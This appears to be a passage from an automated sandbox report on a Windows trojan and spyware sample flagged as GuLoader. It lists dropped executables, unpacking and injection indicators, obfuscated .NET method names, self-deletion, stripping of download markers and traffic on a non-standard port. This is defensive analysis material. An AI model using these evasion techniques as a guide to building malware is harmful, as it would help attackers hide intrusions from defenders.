                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0541F8C0 NtUnmapViewOfSection,17_2_0541F8C0
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02867502 NtAllocateVirtualMemory,24_2_02867502
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028675C6 NtAllocateVirtualMemory,24_2_028675C6
                      Source: 4924.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: fw8ex1BNek.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\acgvitwJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/9@50/10
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: fw8ex1BNek.exeVirustotal: Detection: 39%
                      Source: fw8ex1BNek.exeReversingLabs: Detection: 37%
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\fw8ex1BNek.exe "C:\Users\user\Desktop\fw8ex1BNek.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\acgvitw C:\Users\user\AppData\Roaming\acgvitw
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4924.exe C:\Users\user\AppData\Local\Temp\4924.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8CE5.exe C:\Users\user\AppData\Local\Temp\8CE5.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exeJump to behavior
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DB56.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: fw8ex1BNek.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: fw8ex1BNek.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: fw8ex1BNek.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: fw8ex1BNek.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: fw8ex1BNek.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: fw8ex1BNek.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: fw8ex1BNek.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
                      Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
                      Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeUnpacked PE file: 23.2.4924.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeUnpacked PE file: 0.2.fw8ex1BNek.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\acgvitwUnpacked PE file: 11.2.acgvitw.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeUnpacked PE file: 23.2.4924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Yara detected GuLoaderShow sources
                      Source: Yara matchFile source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmp, type: MEMORY
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_0042C14A pushad ; retn 0042h0_2_0042C14D
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_0081F61C push 27BD53DCh; ret 0_2_0081F63C
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00820A62 push esp; iretd 0_2_00820A6F
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_0081F3A3 push esi; iretd 0_2_0081F3A9
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_008205A7 push edi; ret 0_2_008205A8
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_008205B4 push ebp; retf 0_2_008205B5
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_0081C7BC push ecx; ret 0_2_0081C7BD
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00820351 push es; ret 0_2_00820371
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_0042C14A pushad ; retn 0042h11_2_0042C14D
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007EFE41 push es; ret 11_2_007EFE61
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007EC2AC push ecx; ret 11_2_007EC2AD
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007F00A4 push ebp; retf 11_2_007F00A5
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007F0097 push edi; ret 11_2_007F0098
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007EEE93 push esi; iretd 11_2_007EEE99
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007F0552 push esp; iretd 11_2_007F055F
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_007EF10C push 27BD53DCh; ret 11_2_007EF12C
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_00AA9C81 push 00000028h; retf 0000h17_2_00AA9C86
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_00AA9E0B push esp; ret 17_2_00AA9E25
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052F0D8C push E86E0343h; retf 17_2_052F0D91
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052F1868 push ss; iretd 17_2_052F1807
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0533D4EB push esp; iretd 17_2_0533D4F1
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0533CF38 pushad ; retf 17_2_0533CF39
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0533CF78 pushfd ; retf 17_2_0533CF79
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0533E0B6 push eax; ret 17_2_0533E0B8
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_00AA9C81 push 00000028h; retf 0000h18_2_00AA9C86
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_00AA9E0B push esp; ret 18_2_00AA9E25
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_014D3CD3 push esp; iretd 18_2_014D3CD1
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_014D3C98 push esp; iretd 18_2_014D3CD1
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_02995E93 push cs; ret 23_2_02995F04
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_737830C0 push eax; ret 24_2_737830EE
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028642E1 push edx; iretd 24_2_028642E2
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_73781BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,24_2_73781BFF
                      Source: DB56.exe.5.drStatic PE information: 0xA6AE113F [Tue Aug 13 00:52:15 2058 UTC]
                      Source: 4924.exe.5.drStatic PE information: real checksum: 0x646b4 should be: 0x646d1
                      Source: DB56.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x939dd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.03736201849
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.52699661786
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.03736201849
                      Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: DB56.exe.5.dr, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: DB56.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 17.2.DB56.exe.aa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 17.0.DB56.exe.aa0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 17.0.DB56.exe.aa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 17.0.DB56.exe.aa0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 17.0.DB56.exe.aa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 17.0.DB56.exe.aa0000.0.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 17.0.DB56.exe.aa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 17.0.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 17.0.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 18.0.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.DB56.exe.aa0000.13.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 18.0.DB56.exe.aa0000.13.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 18.0.DB56.exe.aa0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 18.0.DB56.exe.aa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.2.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 18.2.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.DB56.exe.aa0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
                      Source: 18.0.DB56.exe.aa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
                      Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\acgvitwJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8CE5.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\acgvitwJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DB56.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4924.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeFile created: C:\Users\user\AppData\Local\Temp\nsn7A92.tmp\System.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 7769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7769 -> 49850
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\fw8ex1bnek.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\acgvitw:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
